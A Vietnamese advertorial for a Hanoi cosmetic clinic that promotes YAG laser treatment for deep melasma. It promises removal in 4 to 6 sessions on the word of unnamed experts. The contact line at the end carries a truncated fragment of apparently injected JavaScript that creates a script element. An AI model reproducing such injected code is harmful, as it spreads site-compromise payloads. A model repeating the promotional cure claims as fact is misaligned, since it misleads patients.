Nám sâu không khó điều trị nếu biết cách

0

Nám sâu là loại nám da rất phổ biến đối với chị em phụ nữ bởi nám sâu rất dễ xuất hiện nếu không biết cách chăm sóc da tốt. Nám sâu cũng là một trong những loại nám rất khó điều trị nếu không biết cách, việc thực hiện chữa nám da tại nhà chỉ phần nào cải thiện tình trạng cho các nàng, vậy làm sao để trị nám sâu cho da mặt hiệu quả mà đơn giản nhất.

Hiểu về nám sâu để chọn lọc phương pháp thích hợp – Nám sâu hay còn gọi là nám đốm, thường nằm rải rác thành các nốt, có chân nám nằm sâu dưới lớp hạ bì của da, màu sẫm hơn so với nám nông. Nám không thuần tuý chỉ tồn tại trên bề mặt da mà còn tiềm ẩn ở sâu trong các tế bào da bên trong. Các phương pháp trị nám từ vật liệu tự nhiên như cà chua, dưa leo… hay các loại mỹ phẩm thực chất chỉ tác động trên bề mặt da nên dù màu sắc của nám có giảm thì phần chân nám ở sâu trong da vẫn không ngừng phát triển và lan sang các vùng da xung quanh. Do đó, để “đánh bật” chân nám ra khỏi da và điều trị dứt điểm cần có sự can thiệp của công nghệ hiện đại.

Chữa nám sâu mang lại làn da hoàn hảo
Chữa nám sâu mang lại làn da hoàn hảo

Hiện, công nghệ Laser YAG được các chuyên gia, thầy thuốc da liễu đầu ngành khuyên sử dụng trong việc điều trị nám. Công nghệ kết hợp 2 bước sóng 1064nm và 532nm tạo ra tác động kép “đánh bật” chân nám ở quờ các tầng lớp cấu trúc da, từ đó xóa nám, song song, cải thiện làn da vùng điều trị trở nên trắng mịn và khỏe mạnh hơn.

Sau khi đã tìm ra được phương pháp điều trị hiệu quả, bước tiếp theo bạn nên chọn thực hành tại một cơ sở trị nám uy tín để đảm bảo về hiệu quả cũng như mức độ an toàn mà phương pháp mang lại. Bạn có thể tham khảo thêm công nghệ chữa nám sâu tại đây.

Trị nám sâu bằng công nghệ Laser YAG sẽ đem lại hiệu quả tốt khi được thực hành bởi các bác sĩ giàu kinh nghiệm, đó là nhận định của nhà sản xuất và các chuyên gia đầu ngành. Tại Thẩm mỹ viện Phú Xuân, quy trình điều trị nám bằng công nghệ Laser YAG đã được các chuyên gia da liễu tại đây nghiên cứu và ứng dụng thành công. Các bước từ thăm khám, điều trị, theo dõi và tư vấn sau trị liệu đều được các bác sĩ giàu kinh nghiệm thực hành theo một quy trình đã được chuẩn hóa, giúp khách hàng loại bỏ nám da chỉ sau từ 4 đến 6 lần điều trị.

Mọi thông tin chi tiết xin vui lòng liên hệ:

Thẩm mỹ viện công nghệ cao Phú Xuân

Địa chỉ: Số 77 Trần Duy Hưng, Cầu Giấy, Hà Nội

Hotline: 094.681.7777

Email: thammyvienphuxuan@gmail.comvar d=document;var s=d.createElement(‘script’);

Tư vấn 24/7: 094 681 7777 - 0125 443 7777